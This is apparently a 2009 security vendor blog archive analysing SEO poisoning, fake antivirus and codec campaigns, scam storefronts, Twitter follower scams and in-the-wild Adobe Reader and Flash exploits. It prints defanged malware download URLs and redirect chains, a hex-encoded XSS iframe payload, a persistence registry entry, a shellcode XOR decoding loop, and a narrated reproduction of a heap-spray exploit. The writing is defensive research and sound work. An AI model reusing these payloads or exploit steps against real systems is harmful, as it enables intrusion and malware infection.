Tuesday, December 22, 2009

Malware attacks on Winter Solstice - Shortest day of the year 2009

Yesterday, December 21st 2009 was the Winter Solstice, meaning that it was the shortest day of the year. Malware authors did not miss this opportunity to push their malicious binaries using SEO (search-engine optimization) attacks. My colleague already posted a blog on SEO attacks where he mentioned that an SEO attack takes the advantage of Google's PageRank Technology to push search results to the top. We found several phrases/names like “Winter Solstice 2009 celebration” or “Shortest day of the year 2009” used in the search query resulted in a page redirecting to malicious sites containing malware. Here is the screenshot of search result,


Looking at the screenshot, you will find that the 3rd and 5th search results are malicious. Attackers use SEO as users are more likely to click on links which show up as top results. Clicking on the 3rd link uses redirection to direct victim to a malicious site hosting malware. Here is what a user will see,


Redirection could take the victim to a variety of sites, all of which are hosting fake security applications. The malicious sites are using fake images, popups or even showing videos to social engineer the victim into downloading a malicious executable once they click on the page. Here are some few sites used for downloading the malware:

“hxxp://ftorm.com/scn/579876515334ef7a1587…[truncated]”

“hxxp://shjow.com/scn/3fe14f17847082bd940b…[truncated]”

“hxxp://prizepcscan.com/?p=p52dcWpsal%2FCj…[truncated]”

“hxxp://newscanonline.info/downloads.php/?aff_id=384…[truncated]”

Here are screenshots of the malicious sites:


The above images are taken after clicking on the same search results multiple times, resulting in redirection to different attack sites and methods used for infection. Sometimes the victim will be presented with a video playing or popup images or messages urging the victim to install fake anti-virus software. The sites displaying videos will download a file named “Flash_Plugin_Setup1261476530.exe” to the system and other sites download “setup.exe” as a malicious file. Here are the virus total results for those files,

For “Flash_Plugin_Setup1261476530.exe”

http://www.virustotal.com/analisis/78f7246e0e6b9ae58bba1581727f2f598d330cfaf34c987f1bed665ee53429cb-1261476806

For “setup.exe”

http://www.virustotal.com/analisis/2f86f7bc9139dc4267ad1325c92f08557f5a359e6d74ccb6620248b99cf9a68e-1261476933

The “setup.exe” has very poor detection (4 out of 41). This is not the first time malware authors have used the latest hot news, celebrity’s names, holidays, popular event etc. They use such key phrases to push their malicious site to the top of the search results using SEO techniques. They continually change their malicious binaries in order to evade Anti-viruses from detection. The success of this approach is demonstrated in the above Virustotal results illustrating poor AV detection. Be sure to never download anything from redirected site promising free security software.

Be Safe,

Umesh

Monday, December 21, 2009

Beware of SEO attacks

On Sunday, Tom Stuker, a United Global Services member that flew about 700,000 miles this year, was interviewed on Fox News. Not long after that, the top Google search results for Tom Stuker were all poisoned to have links that take the victim to Fake AV malware downloads.

SEO (search-engine optimization) attacks, take advantage of Google's PageRank Technology to have their page result bubble to the top. Google's PageRank Technology is based on a web of trust, they rank pages that are linked to as being of higher importance and thus scored higher. However, using clever hypertext content for their page and an army of bots to spread links on forums, blogs, hacked websites, etc. hackers are able to grab the top spots for their search terms of choice.

Given the speed at which these search terms are poisoned, it is likely that the hackers may have bots monitoring popular media feeds for names / key-phrases that folks are likely to Google. This type of leveraging of the media as a decision-based feed for automation reminds me of the fictional book Daemon. Other members in the security industry have taken recent notice to these rapid SEO attacks as well: Brittany Murphy SEO and Beware of bad Google search results.

Following the redirects to get to the malware for one of the Tom Stuker examples seen yesterday:

hxxp://davtech.org/sqr.php?in=tom%20stuker
302s to: hxxp://hirm9k.xorg.pl?in.php?t=cc&d=20-12-2009_some2&h=davtech.org&p=http%3A%2F%www.google.com [snip...]
302s to: hxxp://newvirusscan.com/hitin.php?land=20&affid=92400
302s to: hxxp://newvirusscan.com/index.php?affid=92400

few js's load then the payload:
hxxp://newvirusscan.com/downloader.php?affid=92400
200 response: Content-Disposition: attachment; filename="install.exe"

Interesting stuff in the 200 OK response from the server:
Pragma: hack

Uploaded sample to VirusTotal (first one seen for this sample) - poor detection (13/41): http://www.virustotal.com/analisis/af58ed98fdc57ed25eb59d7e21b28f9f270bae6a5a8ca789f97876641567800f-1261348933



Saturday, December 19, 2009

Going Green? The Cloud can help...

In light of the U.N. Climate Conference in Copenhagen, Denmark this week, and the agreement "to set a mitigation target to limit warming to no more than 2 degrees Celsius" I thought it would be fitting to do a quick post on the energy-saving benefits of cloud computing ... whether you are doing it to save the polar bears or to save some cash, these benefits should be recognized and considered by many organizations.

Do a Google search for cloud computing energy saving and you get about 195,000 results. This does not come as a surprise, because as one of the results states, cloud computing is "an inherently energy-efficient technology." No shock here: the amount of computing power that most organizations have is well beyond what is actually being used by their employees ... and as Moore's Law indicates, this computing power will double every two years. Many of the servers in your organization's server racks are not doing anything terribly complex: handling DNS lookups, processing email, filtering traffic, and storing data. Most organizations have a separate server for each function and may have redundant / fail-over servers as well.

This website calculates the electricity cost of running a desktop computer to be $405/year (330 Watt power supply and $0.14/kWh). A Dell PowerEdge 2970 has a 750 Watt power supply with an option for a redundant power supply for fail-over. Running this server has an electricity cost of $907/year per power supply. HowStuffWorks details how much electricity coal generates (roughly 2,460 kWh/ton). Running the example server with one power supply for a year uses 6,480 kWh, requiring 2.6 tons of coal.

Cloud computing companies often lease space in data-centers, which charge a premium for power, cooling, and rack-space (see Datacenter energy costs outpacing hardware prices). In order for companies that offer services in the cloud to remain competitive, they must be efficient with their computing power: consolidation, virtualization, efficient software, "smart" power management, etc. So adopting cloud computing is a good thing: it saves electricity/money/coal/pollution/polar bears/planet and funds the innovation of efficient computing.

Friday, December 18, 2009

1 Week 'til XMAS... Avoid Shopping Woes

Many folks are familiar with fake goods sites (e.g., replica watches and fake pharm / pill sites). These sites either peddle shoddy goods, or just flat out steal your payment credentials.

In case you needed to be reminded this holiday season, there are more than the obvious scam sites out there. Many show up in search engine results / advertisements and forum / e-mail advertisements (spam). On top of which, many have been in business for more than this holiday season.

Some examples,
hxxp://www.cheap-abercrombie.com/
hxxp://www.variantkicks.com/
hxxp://www.tiffanyoutlet.com/

You can see by visiting the sites, that their virtual store-fronts look legit:


The Name Records for each of these examples dates back to 2001, 2007, and 2008:

There are many more examples of these questionable virtual storefronts. However, I was able to find a single forum post spam advertising the above examples (which I why I selected these three):

This site states that cheap-abercrombie.com advertises that their merchandise is authentic, but customers are reporting the merchandise to be poorly made replicas with no option for return / refund.

This site states that variantkicks.com sells counterfeit shoes and charges $36 USD for returns.

The tiffanyoutlet.com site does not currently resolve an A record (but is also not showing that it is suspended by the Registrar). Google has a cached page of the site here, and Google results show that the site has been advertised via spam and is peddling fake jewelry.

Whether you are buying your sweetie a tennis bracelet, a sweater, or some new kicks this holiday season, buy from reputable stores, do your research, and if you have any doubt about the legitimacy of a store, err on the side of caution and shop elsewhere. Onguardonline.gov has more advice for online shopping here.

Don't watch-familyguyonline.com

... or at least be careful if you do.
Who doesn't like a good episode of Family Guy? Well even if you don't, that isn't the point of this post. There are dangers visiting and trusting sites that link to and embed content into their site without validating the content first. Malware advertisers have been leveraging pop culture content and stories to entice and social engineer their victims into downloading their malware - Michael Jackson's death themed malware is a prime example. This morning I came across some malicious redirector sites that look very much like (and may be) legit sites. None-the-less, when a visitor follows the embedded video link to view their favorite episodes of Family Guy or another show, they would receive an annoying dose of survey pages (i.e., sign me up for spam) and/or malware.

Here's a snippet of such sites for Family Guy:
watch-familyguyonline.com
www.watch-family-guy-online.com
www.watch-familyguy-online.com
watchfamilyguyonline.org

What appears to have happened here is that sites like these automatically embed links to megavideo.com or other external video sources that are tagged as being Family Guy (or other specific) episodes without validating them.

Following the redirects, I tracked these two examples to the following malware:
hxxp://watch-familyguyonline.com/testt/
hxxp://www.watch-family-guy-online.com/season-8/episode-9-business-guy/

The loaded megavideo.com content, eventually taking the path:
  1. Megaclick.com, e.g., hxxp://s.megaclick.com/ad.code?de=9e09c529-07435895-c974b103-73e05fb5-bd3a-4-a48c&tm=1261149695.21963&du=aHR0cDovL3d3dy55ZXpsaW5rLmNvbS9zdGF0cy5waHA%2fcD1tZWdhY2xpY2tnenVz%0a&api_var_rd_mode=popunder_html
  2. Yezlink.com, e.g., hxxp://www.yezlink.com/stats.php?p=megaclickgzus
  3. 302 redirect to hxxp://www.gameztar.com/go.php?a=1839&l=112
  4. 302 redirect to hxxp://www.gameztar.com/startDownload.do?a=1839&l=112
  5. Download: hxxp://download.gameztar.com/toolbar/gameztar/download/avatar/2.1.102.r6380/000011_oSz/gameztar_installer.exe

The MD5 of the sample is: c5b8e34abfb067ddc5f294cb057f86a0
With VirusTotal results (9/41): http://www.virustotal.com/analisis/a4b092a2b60a07aa6127314e5fbf37642272ad725569ed008df108fe43fd524b-1261147802

Update:
While writing this post, it appears that the first video has already been removed by megavideo (for infringement violation).


Wednesday, December 16, 2009

New Zero day Adobe Acrobat Reader vulnerability analysis – Part 2

Earlier, in the first blog of this series we talked about a malicious PDF file and extracted the malicious script. Now, we have a malicious script in readable format and want to know if this successfully runs or not. I am not going to run the original malicious file for now. I will replace the original shellcode with a simple one which will open a “calc.exe” after successful exploitation. The problem is the original malicious PDF file is in encoded format so we can’t edit the malicious script inside the file. For that I will create a new test PDF file using “make-pdf-javascript.py” tool from PDF Tools. This tool will create a simple PDF file containing JavaScript which will display a message box once opened. I am going to add malicious JavaScript code inside this file using command,

D:\make-pdf-javascript.py --javascriptfile=Malicious_Script.js test.pdf

I am going to use another shellcode which will open “calc.exe”. Here is the newly created PDF file:

Let’s open it and see if this exploit works. This time it only crashed and did not opened a “calc.exe”. But I got a chance to look into the debugger. Here is the state of the ollydbg debugger,

The EDX currently points to zero and it is trying to CALL DWORD from [EDX +4]. Since it is zero, it has an access violation exception. Further we found that the module is “C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api”. Let’s change some EDX values manually in the debugger to see if this is going to work or not? Since we have already filled a heap we need to change values accordingly. I found our NOP sled and shellcode gets loaded at “0A0A0A0A” address, so this is the value we are going to use. Here is the state of ollydbg once I modify the values,

Now, EDX points to “0x0A0A0A0A” address and [EDX + 4] contains address “0x0A0A0A20” which is our NOP sled. So once I press “F9” (run) button in Ollydbg, it will jump to “0A0A0A20” address and will execute everything from there on. You can see this step by step during debugging. Yes, it has executed the NOP sled and our shellcode and “calc.exe” opened on the machine. But this was done by changing the values manually. It looks like there is problem with memory corruption. I played a little bit with the code and found that we have to add one more line of the vulnerable function before try{} block. Here is how new modified code will look,

Once I run this file again, the shellcode executed successfully and it showed a classic POP up box with error message and opened “calc.exe”,

From above, it is clear that there is memory free issue with the vulnerable method “util.printd()”. It required calling this method twice with the try {} block. The code gets executed successfully and opened a calculator. This means if we now remove the “calc.exe” shellcode and use the original shellcode, then it is going to execute in the background without any notice. I am not going into more details of the original shellcode this time due to length of the blog post.

That is it for this series.

Umesh

New Zero day Adobe Acrobat Reader vulnerability analysis – Part 1

On December 14th, Symantec and Shadowserver reported a new zero day vulnerability in the wild affecting Adobe reader. This is now identified as CVE-2009-4324. Adobe acknowledged the same on their website saying they are investigating this issue. And as usual, it is not the first time that PDF’s are being targeted for exploitation. Earlier we saw that Flash files are being targeted, taking advantage of known vulnerability in the wild. This time it is an Adobe zero day vulnerability being exploited in the wild. A colleague provided me with a sample PDF file exploiting this vulnerability in the wild. I started looking into it in depth. The PDF file was obfuscated and not in the readable format. I used my favorite “pdf-parser.py” from PDF Tools. I ran the malicious PDF file through this parser and took the output of every element of PDF file in a text file. Here is how it looks:

The output file was very big and I wanted to the malicious script code inside it. As I said earlier, the file was obfuscated and contains a lot of objects/elements inside. I was only interested in the some strings like JavaScript, FlateDecode, etc. I tried to search for these blocks inside the output file and I found some of interest:

The above screenshots show some of the interesting blocks and which were used to uncover the malicious code inside. The “pdf-parser.py” tool has some very good options to parse the certain objects inside the file. I looked at the documentation of the tool and some of the options looked valuable to me. Here are some options and documentation directly copied from PDF Tools site.

“Filter option applies the filter(s) to the stream. For the moment, only FlateDecode is supported (e.g. zlib decompression). The raw option makes pdf-parser output raw data (e.g. not the printable Python representation). Objects outputs the data of the indirect object which ID was specified. This ID is not version dependent. If more than one object have the same ID (disregarding the version), all these objects will be outputted.”

This is what we need for running against suspicious blocks or objects inside PDF file. I then ran a command against this object tag ID 110 using command like,

D:\ >pdf-parser.py --object=110 --raw –filter malicious-file.pdf > output.log

The command run successfully and I was interested to see if we get any interesting data in the output file. I opened the file and found very suspicious and obfuscated JavaScript code:

Now, from this it was easy to work. I opened Malzilla (malware hunting) tool and copied above script into decoder section of the tool. I ran the ‘Run Script’ button and found another script but it was in readable format. Here how it looked:

Let’s copy this and put it in a text file so that we can able to see whole script. This is a screenshot of full script used in the PDF file,

If you look at the strings and code above, it is clearly a heap spray code and this code relates to adobe reader. It is checking the version of application and if the application viewer version is greater than 8 then only it will exploit the vulnerability. This identifies that it is targeting latest Adobe reader. There is also one JavaScript function called “util.printd()”, one try{}-catch{} block and this looks the culprit. This function returns a date using a specified format according to documentation on Adobe. If you look at the parameters passed to this function, it is invalid and contains @ and some long numbers. This is likely the vulnerable method causing memory corruption in Adobe reader.

This is the first blog on the series and I will provide more information in the second blog of this series. The second blog will cover if the exploit is successful or not and how it can be leveraged further. I mentioned earlier in the Flash blog series as well that new zero day vulnerabilities continue to be discovered in the wild affecting popular applications like Adobe. The solution to this will be to disable JavaScript withing Acrobat Reader, described by the Shadowserver team, as Adobe does not have patch yet.

That’s it for now. Happy hunting!!!

Umesh

Tuesday, December 15, 2009

2010 Security Predictions

2009 was the year that we learned the meaning of the word recession and looked to the cloud for answers. Budgets were slashed and security departments were forced to do more with less, all while cybercrime rates rose as frustrated individuals used whatever means necessary to earn in a difficult economic climate. What 2010 will bring remains unclear but as we approach the New Year, optimism is beginning to emerge.

On the technology front, the ‘cloud honeymoon’ is over and now the hard work begins. Mobile is as exciting as ever with new platforms and functionality emerging with vendors battling for dominance. Social networking winners have been established, but we’re just beginning to see their true potential. Much remains to be seen but one thing is for sure – attackers are following these trends just as closely as the enterprises and consumers that benefit from them. That which becomes popular today, will be the attack vector of choice tomorrow. Below are our security predictions for the New Year.

1.) Apple is forced to climb the security learning curve

Apple has for some time been considered to have a safer operating system in OS X as it is less often targeted by attackers. While that may be true, it is less secure overall and Apple's increasing market share will force them to finally invest in security due to increasing attacks targeted at Apple devices.

2.) App Store Party Crashers

App stores are all the rage, with every mobile vendor racing to replicate Apple's success. Generally, vendors stand guard and only let in the applications that they feel are appropriate. Consumers mistakenly believe that this ensures that only secure applications can be obtained but that is not the case. Security testing is limited at best with app developers already having success slipping in apps with undocumented APIs. Attackers will take things one step further and slip malicious apps in under the gatekeeper's watch.

3.) Web based worms go prime time

We've been teased with a variety of web based worms from Samy to StalkDaily. Most have been experiments as opposed to planned attacks with the goal of financial gain. That's about to change.

4.) The emergence of the web platform

We've gone from web sites to web applications and we're now seeing the birth of the web platform. Social Networking sites such as Facebook have gone beyond delivering dynamic applications welcoming user-supplied content. They have now evolved into platforms inviting user-supplied functionality, allowing virtually anyone to develop unique applications within their ecosystem. Attacker will take advantage of this to deploy malicious applications on social networks and the sites will struggle to identify and block them before deployment.

5.) Attackers turn to the cloud

The cloud offers unprecedented storage and processing power at an attractive price. Think that's only attractive to enterprises? Think again.

6.) The arrival of financial DDoS attacks

Cloud based services generally charge based on actual consumption. This provides attackers with incentive to hold enterprises hostage by artificially inflating costs. Unfortunately, cloud providers have little incentive to stop this practice.

7.) Poking holes in the cloud

My greatest hope for 2010 is that marketing departments will give the term 'cloud computing' a well-deserved break. 2009 saw great interest in the development of cloud computing architectures and one must wonder how often security was sacrificed in order to get to market quickly. Expect attackers to devote time to poking holes in the APIs of cloud providers. When they're found, thanks to multi-tenant architectures, it will have been worth the effort.

8.) Clickjacking comes out of hibernation

Clickjacking roared onto the scene in the summer of 2008 when Jeremiah Grossman and Robert Hansen had their OWASP talk delayed at the request of Adobe. The sensational web cam/microphone hack that drew media attention has been addressed, but the overall flaw still remains. Clckjacking can be a valuable tool in a social engineering attack and we’ve just begun to see it leveraged in attacks.

9.) Browser vendors finally start to take XSS seriously

I was very encouraged when Microsoft released IE 8 this year and it included cross-site scripting (XSS) protection. For all of the heat that Microsoft takes for security vulnerabilities, they continue to be a leader when it comes to adding innovative security features and this was another example. I’m confident that other browser vendors have taken notice and will fall in line.

10.) Past Data Breaches will look like child's play

This is by far the easiest prediction to make. We’ve all been amazed by the staggering numbers of compromised accounts in the CardSystems, Heartland and TJX data breaches, but prepare to be blown away once again. After all, records were made to be broken. As memory becomes cheaper and power becomes more expensive, enterprises are looking to consolidate data storage and continue to build massive data centers and develop ever larger data stores thanks to cloud computing. The volume of data that can be stolen when adequate security controls are not implemented will be truly staggering.

Monday, December 14, 2009

Case Study: Fake Codec Leveraging LastFM


The Fake Codec / Fake Anti-Virus malware campaign, historically led by the Russian Business Network (RBN), has been going on for some time (here's a blog post dating back to 2006). Dancho Danchev's blog often details this campaign as well. While the campaign hasn't changed that drastically from its inception, I thought I'd provide an overview of a case seen this morning to highlight its current state.

This morning's case used a LastFM user profile to advertise a Britney Spears sex tape:
hxxp://www.last.fm/user/BritneySpears33

LastFM is not the only victim of having malware campaigns advertised through their social networking interface (other examples where Fake Codec / AV malware has been advertised include other popular social sites: LinkedIn, Hi5, Digg, Scribd, and yes Facebook).

Here are a few more examples of these advertisements seen in LastFM (be careful if you follow these links): example 1, example 2, and example 3.

The Shoutbox portion provides a link to kick-off the "fun-filled" viewing for the unsuspecting victim ...

The link directs the would-be victim to: hxxp://bigtubeforyou.com/mirolim-video/5.html
which presents the browser with the obfuscated Javascript:

which decodes to:
var1=71;var2=var1;
if(var1==var2) document.location="hxxp://evamendesochka.com/go.php?sid=<num>";

The "sid" parameter allows the client to cycle through a round-robin of 302 redirects to Fake Code / AV malware sites including:

hxxp://showmelovetube.cn/tube.htm
hxxp://door-ringer.cn/?pid=116&sid=299a9c
hxxp://tinytubetv.com/xplaymovie.php?id=45233

With malware downloads to:

hxxp://tubefreewatch.cn/1/install_plugin.exe
hxxp://windows-antivirus2.com/download/Inst_116.exe
hxxp://clearcristalmedia.com/flash-HQ-plugin.45233.exe

Some of the A records for the above used domains:
bigtubeforyou.com. 3600 IN A 66.36.248.253
evamendesochka.com. 2123 IN A 66.36.231.29
showmelovetube.cn. 2145 IN A 66.36.248.253
tubefreewatch.cn. 3600 IN A 66.36.248.253

NS records for the above used domains include:
ns1.kimmusha.com. 172513 IN A 66.36.231.29
ns1.evamendesochka.com. 172800 IN A 66.36.231.29

Taking a look at the 66.36.0.0/19 rwhois for this hopone.net block shows that the two IP addresses used in this campaign are specifically swipt out for the "
sls-db4p12" network name, "svservers" organization:


The sls-db4p12 network name identifies the IPs as being part of superb.net network. The organization, svservers has been identified (again, dating back to 2006) in the past involved in supporting spamming / hacking operations. SvServers is a Russian dedicated hosting service:


These redirect / malware domains will be updated by the malware provider as they are discovered and blocked (e.g., by Google / browser alerts). One out of the above three was in my browser's alerts at the time of writing this up. Fortunately for reputation-based schemes, such as Zscaler's Page Risk Indexing, these IPs and certainly the SvServers infrastructure will be in use a bit longer by the malware provider.

The malware samples have very poor detection:

Inst_116.exe
MD5: c0d2017be29e5383b1a680ef59ed22e0
VirusTotal (5/41): http://www.virustotal.com/analisis/d1a052f117f1e0e4f828c04b7cabd8428cde6b9fc11f61e6e2f3d63ec01f9152-1260842320

flash-HQ-plugin.45233.exe
MD5: 2d683959e8864707f8f9808c404cd315
VirusTotal (8/41): http://www.virustotal.com/analisis/439d13cdefff86ed15051920114d10d2b190d08c1620245b15c6e56f1c8958e1-1260844620

and the most interesting for last:

install_plugin.exe
MD5: cbc1760ac498065235fea17f35eb254b
VirusTotal (0/41): http://www.virustotal.com/analisis/387b9195ab821bdc32c8e2523e1137de67305100b992df0d4393198adae292ae-1260817839

F-Prot identified the binary as being packed by NSIS. NSIS is the Nullsoft Scriptable Install System, which states the following capabilities:

The latest release was recent: NSIS 2.46 on December 6, 2009.

7-Zip advertises on their homepage to be able to unpack NSIS. Running the file through 7-Zip, the following file was extracted the from the NSIS file:
cryptwm97.dll
MD5: 2a823c8d471c5b7ee394e8bd2d0087f4
VirusTotal (0/41): http://www.virustotal.com/analisis/327939a7910aa4747302c66ba6f4b6f8eea8cd08a4e3065682a711149c3f318e-1260820248

The DLL is 73728 bytes and imports and leverages functionality from the Windows DLLs:
gdi32.dll, kernel32.dll, ole32.dll, shell32.dll, shlwapi.dll, user32.dll

And exports the functions:
DllInit and DllInstall

Running the install_plugin.exe through a sandbox, a file with the same MD5 as cryptwm97.dll was created on the infected system at the location:

%AppData%\atmsyssound\atmsyssound.dll

Where, %AppData% is a variable that refers to the file system directory that serves as a common repository for application-specific data. A typical path is C:\Documents and Settings\[UserName]\Application Data.

The malware also modified the registry key:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
with value
atmsyssound = "rundll32.exe "%AppData%\atmsyssound\atmsyssound.dll", DllInit"
so that atmsyssound.dll runs its initialization function DllInit every time Windows starts.

No network traffic was observed after infection. There is an identifiable string in the binary, (beyond the function calls from imported Windows DLLs): dvyllawnx.dll. Googling for atmsyssound.dll, cryptwm97.dll, and dvyllawnx.dll revealed no results. While the exact functionality of the binary is currently unknown, odds are that it is an information stealer of some kind or backdoor similar to Zlob (which has been the typical payload of these Fake Codec attacks). I plan to conduct further analysis on the payload and will share in a future blog post if it is interesting.

Some lessons from this:
  • Social network sites allow users (including malicious users) to post / advertise content (including malicious content).
  • While browser alerts and anti-virus products are good tools, they are not very effective by themselves.
  • The Fake Codec / AV campaign is still alive and well after all these years, and these and other malware campaigns will continue to adapt to social networking advertisements and difficult to detect / analyze payloads.

XSS Embedded iFrames

Today we saw a variety of pages being advertised that have search.htm and other pages vulnerable to cross-site scripting (XSS) being used to inject an iframe to a malicious webpage redirector. To an unknowing user following such an advertisement, they would believe that they were just visiting the intended host site unaware that the iframe was also redirecting them to malicious content.

Here are a few examples with some of the malicious XSS advertisements (do not follow these or other "hxxp" URLs below):


In each of the above examples, the parameter passed to the server's .htm or .php file is a string that includes encoded HTML. When the server processes the parameter, it displays the original parameter (users usually want to see their query string) and its results. Because the original parameter is displayed on the page without any sanitization for this type of encoded HTML, it is possible for this XSS to take place. The encoded HTML in each case is hexadecimal encoded HTML:

%3C%2F%74%69%74%6C%65%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%2F%2F%61%73%6B%35%2E%65%75%3E

which decodes to a closing </title> tag for the query string, followed by the malicious iframe to embed:

<iframe src="//ask5.eu">

ask5.eu does a Javascript redirect using parent.location.replace() to:
hxxp://alanhui.co.cc

which does a Javascript parent.location.replace() to:
hxxp://max-well2.cn/?pid=349s01&sid=dd93d9

which lands the user at:
hxxp://windows-antivirus4.com/scan1/?pid=349s1&engine=%3DHW39TjuMDQxLjYyLjEyMyZ0aW1lPTEyNjI4NUEOOAkO

and downloads:
hxxp://windows-antivirus4.com/download/Inst_349s1.exe



Fake AV malware sample:
MD5: c0d2017be29e5383b1a680ef59ed22e0
Virus Total (6/41): http://www.virustotal.com/analisis/d1a052f117f1e0e4f828c04b7cabd8428cde6b9fc11f61e6e2f3d63ec01f9152-1260851264

Monday, November 23, 2009

Twitter Follower Scams

Introduction
It's cool to be on Twitter but it's cooler still to have more followers than your neighbor. Some are so desperate to move into the lead that they're pulling out their credit card to get there. Those gullible enough to participate in the growing number of Twitter Follower scams are sure to be disappointed.

Scammers are setting up websites promising to provide Twitter followers to anyone willing to sign up. There are typically two levels of membership - basic and VIP. A basic membership offers followers in exchange for the right to "use your account to promote [their] services". Effectively, you are handing over your Twitter username and password to a third party that will then leverage your account to promote their service. In return, you are promised Twitter followers. In our tests, we received no followers but were signed up to follow a couple of hundred accounts that were presumably either fake accounts setup by the service or other victims. How do they make money? In part through advertising on their webpage but primarily by convincing individuals to become VIP members. To become a VIP member, you must either recruit others to sign up for the service or pay for the privilege. VIP membership comes with the promise of "100-400 [new followers] each day". If you choose to take the recruitment route, when initially signing up, you are provided with a unique URL that is to be given to others for signup. This will supposedly allow the service to keep track of your recruits and promote you to VIP status free of charge after 15 additional accounts are recruited. We attempted to promote our test accounts to VIP status this way; however, the domain name in the URL provided did not resolve and the request would therefore fail. Effectively, this leaves paying a monetary fee as the only option to achieve VIP status.

The Scam
Promotion
Tweets sent from the accounts of past victims promote one of the many websites driving the scams. The URL is always obfuscated using a URL shortener and numerous URL shortening services are leveraged

Common Tweets
If you want 400 followers a day use…
If you wantt 100 followers a day use…
I got 100 followers using…
I just got 400 followers using…
to get 400 followers a day…
If you want to get alot of followers check out…
Hey I just got alot of followers using…
I got 100 followers in a day using…
Get 500 followers a day using…
THE BEST WAY TO GET MORE FOLLOWERS…
OUR GOAL IS TO GET U MORE FOLLOWERS…
This site got me 200 followers quick…
Want FREE VIP, 100 new followers instantly and 1,000 new followers next week?
The best way to get 100 followers faster is using
Hey I just got alot of followers using

Common sites
http://followersquick.info/
http://tweeterspeed.com/
http://twittfollow.com/
http://followquick.info/
http://tweeterleaders.info/
http://twittfollow.info/
http://wannafollowme.com/
http://twtfast.info/
http://twitter-builder.com/

Whois information and IP address lookups suggest that at least some of the aforementioned websites are run by the same individuals. A number of the sites resolve to a single web hosting company in Malasiya and use the WhoisGuard service to hide registration information for the domains in question.

Propagation
When a user visits the site and enters their Twitter name and password, they have effectively handed over control of their Twitter account to a third party. The scammers will then use that account to futher promote the service. The user may receive a handful of followers but in our experience, they are simply fake accounts set up by the scammers themselves, if any followers are received at all. One of our favorite touches…the 'I agree with the rules' checkbox on the signup page, can't be unchecked.

Revenue
VIP membership comes with the promise of "100-400 [new followers] each day". It can supposedly be obtained by either recruiting others to sign up for the service or by paying anywhere from $20 to $1,500, depending upon the duration of your VIP status (4 days to one year). Most scams leverage PayPal to complete the transaction. While it’s unclear how many people are actually pulling out their credit card to participate, the volume of Twitter accounts seen that have apparently signed up for the service, along with the number of scams emerging, suggest that the scam is successful.

Sadly, the scammers are actually rather straight forward about what they're doing, if only victims were to take the time to review the 'rules':
  • You have to add all vip users and 20 regular users to join the train.
  • We may use your account to promote our services, with the exception of VIP account.
  • The fee for VIP is non-refundable.
  • After payment, give us up to 6 hours to update your VIP status.
How Successful is the Scam?
Searching for either the phrases used to promote the sites, or the shortened URLs themselves shows that thousands of people are signing up for the services every day in the hopes that it will increase their number of Twitter followers. The screenshot below indicates that for only one of the sites, hundreds or Tweets Per Hour (TPH) are appearing in the Twitter live feed. What's not clear is how many people are taking the additional step of sending money to become VIP members.Twitter's Response
What is Twitter doing about the scams? Nothing. Thousands of tweets promote the scam sites every day and they aren't hard to find. Twitter could easily be implementing filters to identify common phrases or URLs. Beyond this, common phishing blacklists such as PhishTank.org and Google’s SafeBrowsing, are largely ignoring such sites as well.

Conclusion
These sites are scams, plain and simple. In our experience, signing up for the service will ensure that your account is used to send out Twitter spam to promote the service and follow hundreds of other accounts but result in no meaningful additional followers. We chose not to pay for the VIP service but even if followers are added, they will simply be other victims or fake accounts created by those running the scam. If simply building up the number of followers on your Twitter account is of that much importance, regardless of who they are, take the time to create a bunch of fake Twitter accounts on your own – it’s free. If you have signed up for such a service in the past, we recommend changing your Twitter password immediately to ensure that the service can no longer post messages on your behalf. Your account could be used to post content that you don’t approve of and if so, good luck explaining why you shared your Twitter credentials.

Friday, September 18, 2009

In the wild Flash exploit analysis – part 2

In the first blog, we talked about how a recent Flash exploit works using heap spraying. In this blog, we will see how the shellcode functions and how it downloads malicious binaries to an infected system. If you remember, malicious shellcode was loaded on heap by the exploit. So let’s try to see if we can identify strings or URLs in the loaded shellcode. If you look closely, the shellcode is not in a readable format and appears to be encoded. Here is the how shellcode looks:

There is no single identifiable string in the shellcode. Let’s debug this shellcode further to understand if it is encoded or not. When we left off in the last blog, we were at a “CALL EAX” instruction with EAX pointing to 08080808. If we press F9, we will land on the heap and start executing every NOP instruction until ultimately reaching the malicious shellcode. We will reach the first instruction of the shellcode by putting a hardware breakpoint in the shellcode. Here is another screenshot of the debugger:

The shellcode contains some unused instructions and it will be difficult to understand it simply using static analysis. Let’s start debugging step by step. The first few instructions are the same and will POP EAX from stack. Then there is short jump call to 08089C42, which will call the address 08089C32. At which point it will XOR the ECX value and push a value of 3B8 (decimal 952) into CX. Then there is small loop, which is very interesting.

08089C3A 80340B BD XOR BYTE PTR DS:[EBX+ECX],0BD

08089C3E ^E2 FA LOOPD SHORT 08089C3A

The first instruction is XORing every byte with 0BD from the last byte i.e. starting from value (EBX+ECX) until the current EBX value as ECX will start decrementing. This is the method used to encode the original shellcode. After exiting from the loop, we land into decoded shellcode which can now be reviewed. Here is the XOR’ed version of original shellcode:

Gr8! Every instruction is now readable and easy to understand. We can now attempt to identify strings. I went into a memory dump of the heap and converted instructions into Hex/ASCII format. Here, I was able to find some known strings and one URL at the end. Here is the ASCII dump:

Now, this looks pretty straightforward. The above decoded shellcode is going to download “css.exe” to the infected system. At this point, I downloaded the malicious file. Let’s open it in OllyDbg and try to find some additional strings and to see what that executable is doing. I quickly looked at the disassembly and was able to quickly realize what the file is doing. I found an additional URL request in the code:

This executable downloads additional malware by visiting “hxxp://www.ffxiname.com”. Then it will add some registry values and run library “C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\300056251037don.dll,Set1” using "C:\WINNT\System32\rundll32.exe”. The TEMP directory will be full of additional malicious executables and DLL’s. The website in question (“ffxiname.com”) appears to be a drop zone, containing numerous additional exploits. The site will deliver different exploits based on the browser issuing the request. Here are some wireshark packet captures from the website:

The site is exploiting browser specific vulnerabilities to push additional malware. This is not the end of this process. It also downloads,

hxxp://www.40sys40.cn/txt/a1.exe

hxxp://www.40sys40.cn/txt/a2.exe

hxxp://www.40sys40.cn/txt/a3.exe

hxxp://www.40sys40.cn/txt/a4.exe

Additionally, two DLL’s are downloaded into the temp folder. The names of the files are “231053kou.dll” and “231054eve.dll”. Based on strings identified in the DLLs, it appears that they are used to sniff passwords for various web domains as can be seen in the following screen capture:

As can be seen, the initial infection due to the Flash vulnerability is only the start of the process. Successful exploitation leads to additional malicious binaries being downloaded to the infected system. The exploit also led to the installation of malicious DLL’s, which steal valuable information such as login credentials when you visit popular web sites.

